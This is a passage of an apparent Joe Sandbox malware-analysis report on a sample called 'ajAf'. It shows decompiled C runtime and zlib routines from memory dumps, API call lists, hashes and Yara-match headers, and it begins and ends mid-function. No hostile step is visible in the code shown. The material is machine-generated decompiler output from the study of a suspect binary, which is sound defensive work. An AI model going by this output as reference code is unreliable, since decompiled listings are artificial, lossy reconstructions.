                                                          							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                          							_v12 = _t121;
                                                          							__eflags = _t121;
                                                          							if(__eflags != 0) {
                                                          								if(__eflags <= 0) {
                                                          									L71:
                                                          									_t182 = 0;
                                                          									__eflags = 0;
                                                          									L72:
                                                          									__eflags = _t182;
                                                          									if(_t182 == 0) {
                                                          										goto L62;
                                                          									}
                                                          									E0040BA30(_t182, _t182, 0, _v12);
                                                          									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                          									_v12 = _t123;
                                                          									__eflags = _t123;
                                                          									if(_t123 != 0) {
                                                          										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                          										_v20 = _t186;
                                                          										asm("sbb esi, esi");
                                                          										_t184 =  ~_t186 & _v12;
                                                          										__eflags = _t184;
                                                          									} else {
                                                          										_t184 = 0;
                                                          									}
                                                          									E004147AE(_t182);
                                                          									goto L78;
                                                          								}
                                                          								__eflags = _t121 - 0xffffffe0;
                                                          								if(_t121 > 0xffffffe0) {
                                                          									goto L71;
                                                          								}
                                                          								_t127 =  &(_t121[4]);
                                                          								__eflags = _t127 - 0x400;
                                                          								if(_t127 > 0x400) {
                                                          									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                          									__eflags = _t128;
                                                          									if(_t128 != 0) {
                                                          										 *_t128 = 0xdddd;
                                                          										_t128 = _t128 + 8;
                                                          										__eflags = _t128;
                                                          									}
                                                          									_t182 = _t128;
                                                          									goto L72;
                                                          								}
                                                          								E0040CFB0(_t127);
                                                          								_t182 = _t191;
                                                          								__eflags = _t182;
                                                          								if(_t182 == 0) {
                                                          									goto L62;
                                                          								}
                                                          								 *_t182 = 0xcccc;
                                                          								_t182 = _t182 + 8;
                                                          								goto L72;
                                                          							}
                                                          							L62:
                                                          							_t184 = 0;
                                                          							goto L78;
                                                          						} else {
                                                          							goto L58;
                                                          						}
                                                          					} else {
                                                          						if(_t112 != 1) {
                                                          							L58:
                                                          							_t116 = 0;
                                                          							L84:
                                                          							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                          						}
                                                          						_v12 = 0;
                                                          						if(_a28 == 0) {
                                                          							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                          						}
                                                          						_t184 = MultiByteToWideChar;
                                                          						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                          						_t207 = _t182;
                                                          						if(_t207 == 0) {
                                                          							goto L58;
                                                          						} else {
                                                          							if(_t207 <= 0) {
                                                          								L28:
                                                          								_v16 = 0;
                                                          								L29:
                                                          								if(_v16 == 0) {
                                                          									goto L58;
                                                          								}
                                                          								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                          									L52:
                                                          									E004147AE(_v16);
                                                          									_t116 = _v12;
                                                          									goto L84;
                                                          								}
                                                          								_t184 = LCMapStringW;
                                                          								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                          								_v12 = _t174;
                                                          								if(_t174 == 0) {
                                                          									goto L52;
                                                          								}
                                                          								if((_a8 & 0x00000400) == 0) {
                                                          									__eflags = _t174;
                                                          									if(_t174 <= 0) {
                                                          										L44:
                                                          										_t184 = 0;
                                                          										__eflags = 0;
                                                          										L45:
                                                          										__eflags = _t184;
                                                          										if(_t184 != 0) {
                                                          											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                          											__eflags = _t141;
                                                          											if(_t141 != 0) {
                                                          												_push(0);
                                                          												_push(0);
                                                          												__eflags = _a24;
                                                          												if(_a24 != 0) {
                                                          													_push(_a24);
                                                          													_push(_a20);
                                                          												} else {
                                                          													_push(0);
                                                          													_push(0);
                                                          												}
                                                          												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                          											}
                                                          											E004147AE(_t184);
                                                          										}
                                                          										goto L52;
                                                          									}
                                                          									_t144 = 0xffffffe0;
                                                          									_t179 = _t144 % _t174;
                                                          									__eflags = _t144 / _t174 - 2;
                                                          									if(_t144 / _t174 < 2) {
                                                          										goto L44;
                                                          									}
                                                          									_t52 = _t174 + 8; // 0x8
                                                          									_t146 = _t174 + _t52;
                                                          									__eflags = _t146 - 0x400;
                                                          									if(_t146 > 0x400) {
                                                          										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                          										__eflags = _t147;
                                                          										if(_t147 != 0) {
                                                          											 *_t147 = 0xdddd;
                                                          											_t147 =  &(_t147[4]);
                                                          											__eflags = _t147;
                                                          										}
                                                          										_t184 = _t147;
                                                          										goto L45;
                                                          									}
                                                          									E0040CFB0(_t146);
                                                          									_t184 = _t189;
                                                          									__eflags = _t184;
                                                          									if(_t184 == 0) {
                                                          										goto L52;
                                                          									}
                                                          									 *_t184 = 0xcccc;
                                                          									_t184 =  &(_t184[4]);
                                                          									goto L45;
                                                          								}
                                                          								if(_a24 != 0 && _t174 <= _a24) {
                                                          									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                          								}
                                                          								goto L52;
                                                          							}
                                                          							_t150 = 0xffffffe0;
                                                          							_t179 = _t150 % _t182;
                                                          							if(_t150 / _t182 < 2) {
                                                          								goto L28;
                                                          							}
                                                          							_t25 = _t182 + 8; // 0x8
                                                          							_t152 = _t182 + _t25;
                                                          							if(_t182 + _t25 > 0x400) {
                                                          								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                          								__eflags = _t153;
                                                          								if(_t153 == 0) {
                                                          									L27:
                                                          									_v16 = _t153;
                                                          									goto L29;
                                                          								}
                                                          								 *_t153 = 0xdddd;
                                                          								L26:
                                                          								_t153 =  &(_t153[4]);
                                                          								goto L27;
                                                          							}
                                                          							E0040CFB0(_t152);
                                                          							_t153 = _t189;
                                                          							if(_t153 == 0) {
                                                          								goto L27;
                                                          							}
                                                          							 *_t153 = 0xcccc;
                                                          							goto L26;
                                                          						}
                                                          					}
                                                          				}
                                                          				_t178 = _a16;
                                                          				_t157 = _a12;
                                                          				while(1) {
                                                          					_t178 = _t178 - 1;
                                                          					if( *_t157 == 0) {
                                                          						break;
                                                          					}
                                                          					_t157 =  &(_t157[1]);
                                                          					if(_t178 != 0) {
                                                          						continue;
                                                          					}
                                                          					_t178 = _t178 | 0xffffffff;
                                                          					break;
                                                          				}
                                                          				_t160 = _a16 - _t178 - 1;
                                                          				if(_t160 < _a16) {
                                                          					_t160 = _t160 + 1;
                                                          				}
                                                          				_a16 = _t160;
                                                          				goto L13;
                                                          			}


                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022918B8), ref: 004170C5
                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                          • _malloc.LIBCMT ref: 0041718A
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                          • _malloc.LIBCMT ref: 0041724C
                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                          • __freea.LIBCMT ref: 004172A4
                                                          • __freea.LIBCMT ref: 004172AD
                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                          • ___convertcp.LIBCMT ref: 00417309
                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                          • _malloc.LIBCMT ref: 00417362
                                                          • _memset.LIBCMT ref: 00417384
                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                          • __freea.LIBCMT ref: 004173CF
                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                          • String ID:
                                                          • API String ID: 3809854901-0
                                                          • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                          • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 01FD731A
                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 01FD732C
                                                          • _malloc.LIBCMT ref: 01FD73F1
                                                          • _malloc.LIBCMT ref: 01FD74B3
                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 01FD74DE
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 01FD7501
                                                          • __freea.LIBCMT ref: 01FD750B
                                                          • __freea.LIBCMT ref: 01FD7514
                                                          • ___ansicp.LIBCMT ref: 01FD7545
                                                          • ___convertcp.LIBCMT ref: 01FD7570
                                                          • _malloc.LIBCMT ref: 01FD75C9
                                                          • _memset.LIBCMT ref: 01FD75EB
                                                          • ___convertcp.LIBCMT ref: 01FD7621
                                                          • __freea.LIBCMT ref: 01FD7636
                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 01FD7650
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                          • String ID: pWhvPMhv Uhv Ohv FwIhvThv
                                                          • API String ID: 2918745354-2975966627
                                                          • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction ID: 0ee8a039f8f4e8901ccc45db402ea0c7228644e356c9861d4dde0e73097ba10c
                                                          • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                          • Instruction Fuzzy Hash: B2B1F472D0015AEFDF12AFA8CC809BE7FB7EB48358B584629FA15AB110D732C950DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,01FD0977,00000000,00000000,?,00000001,01FCC22D,01FCB993), ref: 01FD084E
                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 01FD0859
                                                            • Part of subcall function 01FCE9D1: Sleep.KERNEL32(000003E8,00000000,?,01FD079F,KERNEL32.DLL,?,01FD07EB,?,00000001,01FCC22D,01FCB993), ref: 01FCE9DD
                                                            • Part of subcall function 01FCE9D1: GetModuleHandleW.KERNEL32(00000001,?,01FD079F,KERNEL32.DLL,?,01FD07EB,?,00000001,01FCC22D,01FCB993), ref: 01FCE9E6
                                                          • __lock.LIBCMT ref: 01FD08B4
                                                          • InterlockedIncrement.KERNEL32(?), ref: 01FD08C1
                                                          • __lock.LIBCMT ref: 01FD08D5
                                                          • ___addlocaleref.LIBCMT ref: 01FD08F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                          • String ID: @.B$KERNEL32.DLL
                                                          • API String ID: 4021795732-2520587274
                                                          • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                          • Instruction ID: f834cd2a62b9f148e1f8f2647c2f5993064816eec6c70b141f80179c9f87e8a8
                                                          • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                          • Instruction Fuzzy Hash: 2011C071900702EED720EF39DD0079ABBE0AF14310F10452EE4AA936A1CB759641CF99
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E004057B0(intOrPtr* __eax) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				intOrPtr* _t57;
                                                          				char* _t60;
                                                          				char _t62;
                                                          				intOrPtr _t63;
                                                          				char _t64;
                                                          				intOrPtr _t65;
                                                          				intOrPtr _t66;
                                                          				intOrPtr _t67;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t70;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t79;
                                                          				intOrPtr _t82;
                                                          				intOrPtr* _t83;
                                                          				void* _t86;
                                                          				char* _t88;
                                                          				char* _t89;
                                                          				intOrPtr* _t91;
                                                          				intOrPtr* _t93;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				void* _t100;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t104;
                                                          
                                                          				_t98 = _t97 | 0xffffffff;
                                                          				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                          				_t91 = __eax;
                                                          				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                          				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                          					__eflags = 0;
                                                          					return 0;
                                                          				} else {
                                                          					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                          					_t101 = _t100 + 4;
                                                          					if(_t93 == 0) {
                                                          						L31:
                                                          						return 0;
                                                          					} else {
                                                          						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                          						 *_t93 = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                          						 *(_t93 + 0x6c) = _t98;
                                                          						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                          						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                          						_t102 = _t101 + 0xc;
                                                          						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                          						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                          						_t87 = _t57 + 1;
                                                          						do {
                                                          							_t82 =  *_t57;
                                                          							_t57 = _t57 + 1;
                                                          						} while (_t82 != 0);
                                                          						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                          						_t103 = _t102 + 4;
                                                          						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                          						if(_t60 == 0) {
                                                          							L30:
                                                          							E00405160(0, _t87, _t93);
                                                          							goto L31;
                                                          						} else {
                                                          							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                          							_t88 = _t60;
                                                          							goto L7;
                                                          							L9:
                                                          							L9:
                                                          							if( *_t91 == 0x72) {
                                                          								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                          							}
                                                          							_t63 =  *_t91;
                                                          							if(_t63 == 0x77 || _t63 == 0x61) {
                                                          								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                          							}
                                                          							_t64 =  *_t91;
                                                          							if(_t64 < 0x30 || _t64 > 0x39) {
                                                          								__eflags = _t64 - 0x66;
                                                          								if(_t64 != 0x66) {
                                                          									__eflags = _t64 - 0x68;
                                                          									if(_t64 != 0x68) {
                                                          										__eflags = _t64 - 0x52;
                                                          										if(_t64 != 0x52) {
                                                          											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                          											 *_t89 = _t64;
                                                          											_t87 = _t89 + 1;
                                                          											__eflags = _t87;
                                                          											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                          										} else {
                                                          											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                          										}
                                                          									} else {
                                                          										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                          									}
                                                          								} else {
                                                          									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                          								}
                                                          							} else {
                                                          								_t98 = _t64 - 0x30;
                                                          							}
                                                          							_t91 = _t91 + 1;
                                                          							if(_t64 == 0) {
                                                          								goto L26;
                                                          							}
                                                          							_t87 = _t103 + 0x68;
                                                          							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                          								goto L9;
                                                          							}
                                                          							L26:
                                                          							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                          							if(_t65 == 0) {
                                                          								goto L30;
                                                          							} else {
                                                          								if(_t65 != 0x77) {
                                                          									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                          									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                          									 *_t93 = _t66;
                                                          									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                          									_t104 = _t103 + 0x14;
                                                          									__eflags = _t67;
                                                          									if(_t67 != 0) {
                                                          										goto L30;
                                                          									} else {
                                                          										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                          										if(__eflags == 0) {
                                                          											goto L30;
                                                          										} else {
                                                          											goto L34;
                                                          										}
                                                          									}
                                                          								} else {
                                                          									_push(0x38);
                                                          									_push("1.2.3");
                                                          									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                          									_push(8);
                                                          									_push(0xfffffff1);
                                                          									_push(8);
                                                          									_push(_t98);
                                                          									_push(_t93);
                                                          									_t91 = E00404CE0();
                                                          									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                          									_t104 = _t103 + 0x24;
                                                          									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                          									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                          									if(_t91 != 0 || _t79 == 0) {
                                                          										goto L30;
                                                          									} else {
                                                          										L34:
                                                          										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                          										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                          										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                          										__eflags = _t69;
                                                          										_push(_t104 + 0x18);
                                                          										if(__eflags >= 0) {
                                                          											_push(_t69);
                                                          											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                          										} else {
                                                          											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                          											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                          											_t70 = E0040CB9D();
                                                          										}
                                                          										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                          										__eflags = _t70;
                                                          										if(_t70 == 0) {
                                                          											goto L30;
                                                          										} else {
                                                          											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                          											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                          												E00405000(_t93, 0);
                                                          												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                          												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                          												__eflags = _t74;
                                                          												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                          												return _t93;
                                                          											} else {
                                                          												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                          												return _t93;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L42;
                                                          							L7:
                                                          							_t62 =  *_t83;
                                                          							 *_t88 = _t62;
                                                          							_t83 = _t83 + 1;
                                                          							_t88 = _t88 + 1;
                                                          							if(_t62 != 0) {
                                                          								goto L7;
                                                          							} else {
                                                          								 *((char*)(_t93 + 0x5c)) = 0;
                                                          							}
                                                          							goto L9;
                                                          						}
                                                          					}
                                                          				}
                                                          				L42:
                                                          			}

































                                                          0x00000000
                                                          0x004058e2
                                                          0x004058e4
                                                          0x00405930
                                                          0x0040593f
                                                          0x00405942
                                                          0x00405944
                                                          0x00405949
                                                          0x0040594c
                                                          0x0040594e
                                                          0x00000000
                                                          0x00405950
                                                          0x00405950
                                                          0x00405953
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405953
                                                          0x004058e6
                                                          0x004058ea
                                                          0x004058ec
                                                          0x004058f1
                                                          0x004058f2
                                                          0x004058f4
                                                          0x004058f6
                                                          0x004058f8
                                                          0x004058f9
                                                          0x00405904
                                                          0x00405906
                                                          0x0040590b
                                                          0x0040590e
                                                          0x00405911
                                                          0x00405916
                                                          0x00000000
                                                          0x00405955
                                                          0x00405955
                                                          0x00405955
                                                          0x00405961
                                                          0x00405963
                                                          0x00405967
                                                          0x0040596d
                                                          0x0040596e
                                                          0x0040597c
                                                          0x0040597d
                                                          0x00405970
                                                          0x00405970
                                                          0x00405974
                                                          0x00405975
                                                          0x00405975
                                                          0x00405985
                                                          0x00405988
                                                          0x0040598a
                                                          0x00000000
                                                          0x0040598c
                                                          0x0040598c
                                                          0x00405990
                                                          0x004059a5
                                                          0x004059ad
                                                          0x004059b6
                                                          0x004059b6
                                                          0x004059b9
                                                          0x004059c5
                                                          0x00405992
                                                          0x00405992
                                                          0x004059a2
                                                          0x004059a2
                                                          0x00405990
                                                          0x0040598a
                                                          0x00405916
                                                          0x004058e4
                                                          0x00000000
                                                          0x00405860
                                                          0x00405860
                                                          0x00405862
                                                          0x00405864
                                                          0x00405865
                                                          0x00405868
                                                          0x00000000
                                                          0x0040586a
                                                          0x0040586a
                                                          0x0040586d
                                                          0x00000000
                                                          0x00405868
                                                          0x0040584f
                                                          0x004057ea
                                                          0x00000000

                                                          APIs
                                                          • _malloc.LIBCMT ref: 004057DE
                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                          • _malloc.LIBCMT ref: 00405842
                                                          • _malloc.LIBCMT ref: 00405906
                                                          • _malloc.LIBCMT ref: 00405930
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _malloc$AllocateHeap
                                                          • String ID: 1.2.3
                                                          • API String ID: 680241177-2310465506
                                                          • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                          • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                          • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                          • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _malloc.LIBCMT ref: 01FC5A45
                                                            • Part of subcall function 01FCBAB4: __FF_MSGBANNER.LIBCMT ref: 01FCBAD7
                                                            • Part of subcall function 01FCBAB4: __NMSG_WRITE.LIBCMT ref: 01FCBADE
                                                          • _malloc.LIBCMT ref: 01FC5AA9
                                                          • _malloc.LIBCMT ref: 01FC5B6D
                                                          • _malloc.LIBCMT ref: 01FC5B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _malloc
                                                          • String ID: 1.2.3
                                                          • API String ID: 1579825452-2310465506
                                                          • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                          • Instruction ID: 32e575a328db9275ec5a5314561b78cfd8513301fdd84e6a43d16793c6225fc2
                                                          • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                          • Instruction Fuzzy Hash: 5E61D1B1E447828FD7209F2D8980666FFE0FB55B10F58492ED1C987610D776B04AEF52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                          				signed int _v8;
                                                          				char* _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t90;
                                                          				intOrPtr* _t92;
                                                          				signed int _t94;
                                                          				char _t97;
                                                          				signed int _t105;
                                                          				void* _t106;
                                                          				signed int _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				intOrPtr* _t114;
                                                          				signed int _t118;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          				char* _t121;
                                                          				signed int _t125;
                                                          				signed int _t131;
                                                          				signed int _t133;
                                                          				void* _t134;
                                                          
                                                          				_t125 = __edx;
                                                          				_t121 = _a4;
                                                          				_t119 = _a8;
                                                          				_t131 = 0;
                                                          				_v12 = _t121;
                                                          				_v8 = _t119;
                                                          				if(_a12 == 0 || _a16 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				} else {
                                                          					_t138 = _t121;
                                                          					if(_t121 != 0) {
                                                          						_t133 = _a20;
                                                          						__eflags = _t133;
                                                          						if(_t133 == 0) {
                                                          							L9:
                                                          							__eflags = _t119 - 0xffffffff;
                                                          							if(_t119 != 0xffffffff) {
                                                          								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                          								_t134 = _t134 + 0xc;
                                                          							}
                                                          							__eflags = _t133 - _t131;
                                                          							if(__eflags == 0) {
                                                          								goto L3;
                                                          							} else {
                                                          								_t94 = _t90 | 0xffffffff;
                                                          								_t125 = _t94 % _a12;
                                                          								__eflags = _a16 - _t94 / _a12;
                                                          								if(__eflags > 0) {
                                                          									goto L3;
                                                          								}
                                                          								L13:
                                                          								_t131 = _a12 * _a16;
                                                          								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                          								_v20 = _t131;
                                                          								_t120 = _t131;
                                                          								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                          									_v16 = 0x1000;
